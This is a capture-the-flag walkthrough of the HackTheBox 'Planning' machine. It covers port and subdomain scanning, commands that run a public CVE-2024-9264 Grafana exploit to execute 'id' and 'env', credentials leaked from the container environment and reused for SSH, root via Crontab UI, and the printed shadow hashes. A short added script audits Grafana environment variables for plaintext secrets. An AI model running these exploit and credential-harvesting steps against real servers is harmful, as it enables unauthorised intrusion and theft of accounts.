Basic info

```
As is common in real life pentests, you will start the Planning box with credentials for the following account: admin / 0D5oT70Fq13EvB5r
```

Port scan

Only 22 and 80 are open:

```
$ nmap -sC -sV -Pn 10.10.11.68
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-15 16:07 JST
Nmap scan report for 10.10.11.68
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
|_  256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://planning.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.58 seconds
```

80

The site redirects to planning.htb, so a hosts entry is needed:

```
10.10.11.68 planning.htb
```

It is an online-education themed site:

Subdomain scan

A fairly large wordlist is needed; with it, the grafana subdomain turns up (responses of size 178 are the default vhost and are filtered out):

```
ffuf -w /Users/miao/Tools/dict/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -u "http://planning.htb/" -H 'Host: FUZZ.planning.htb' -fs 178

grafana [Status: 302, Size: 29, Words: 2, Lines: 3, Duration: 181ms]
```

It is a Grafana instance:

grafana

Logging in with the credentials given at the start shows it is Grafana v11.0.0:

```
admin
0D5oT70Fq13EvB5r
```

CVE-2024-9264

A search for this version turns up the relevant vulnerability:

The command runs as root, but this is actually inside a container:

```
python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c id http://grafana.planning.htb
```

env

The container's environment variables contain a username and password:

```
python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c env http://grafana.planning.htb

GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
GF_SECURITY_ADMIN_USER=enzo
```
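The root cause on the defensive side is a secret stored in plaintext in the container environment, where any code execution (or a `docker inspect`) reads it. Grafana accepts a `__FILE` suffix on any `GF_*` variable to read the value from a file instead. The following audit script is an added example, not part of the original writeup; it scans `env`-style output for plaintext Grafana secrets, and the sample environment is constructed with a placeholder password.

```python
import re
from typing import List, Tuple

# Grafana maps GF_<SECTION>_<KEY> onto its config; a variable named
# GF_<SECTION>_<KEY>__FILE makes Grafana read the value from that file,
# so the secret itself never appears in `env` or `docker inspect`.
SECRET_KEY = re.compile(r"(PASSWORD|SECRET|TOKEN|KEY)$")


def audit_grafana_env(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (variable, finding) for every GF_* line that exposes a
    secret in plaintext. Input is `env` output, one NAME=VALUE per line."""
    findings = []
    for line in lines:
        if "=" not in line or not line.startswith("GF_"):
            continue
        name, value = line.split("=", 1)
        if name.endswith("__FILE"):
            continue  # value is only a path; the secret lives in the file
        if SECRET_KEY.search(name) and value:
            findings.append(
                (name, f"plaintext secret in environment; use {name}__FILE")
            )
    return findings


# Constructed sample modelled on the output above; the password is a placeholder.
SAMPLE_ENV = """\
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
GF_SECURITY_ADMIN_PASSWORD=<placeholder-password>
GF_SECURITY_ADMIN_USER=enzo
GF_DATABASE_PASSWORD__FILE=/run/secrets/grafana_db
GF_PATHS_DATA=/var/lib/grafana
""".splitlines()

if __name__ == "__main__":
    for var, msg in audit_grafana_env(SAMPLE_ENV):
        print(f"{var}: {msg}")
```

The same script does not catch password reuse across services, which is what turned this finding into SSH access; that needs to be checked separately.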

user flag

The same username and password work for SSH:

```
ssh enzo@10.10.11.68
RioTecRANDEntANT!
```

Crontab UI

Checking listening ports reveals a local service on port 8000. After forwarding it out, it asks for a login; routine file browsing turns up a password, and the login lands on Crontab UI:

```
# the username is easy to guess
root
P4ssw0rdS0pRi0T3c
```

Crontab to root

Since Crontab UI runs jobs as root, adding a new crontab entry and running it is enough:

shadow

```
root:$y$j9T$6FXR7mi4BgmaZ7AoBiO470$CBrVTY4d7EK5JUjv8Gc2xjGVxYIr14TUCRkgFY0YvB7:20147:0:99999:7:::
enzo:$y$j9T$D.g0svThdX4dAVCvkaUz3.$jQKKPCGVxCt3NiPX9fCUSzSWXg8V2V6xKvGyhv2yiX.:20147:0:99999:7:::
```

References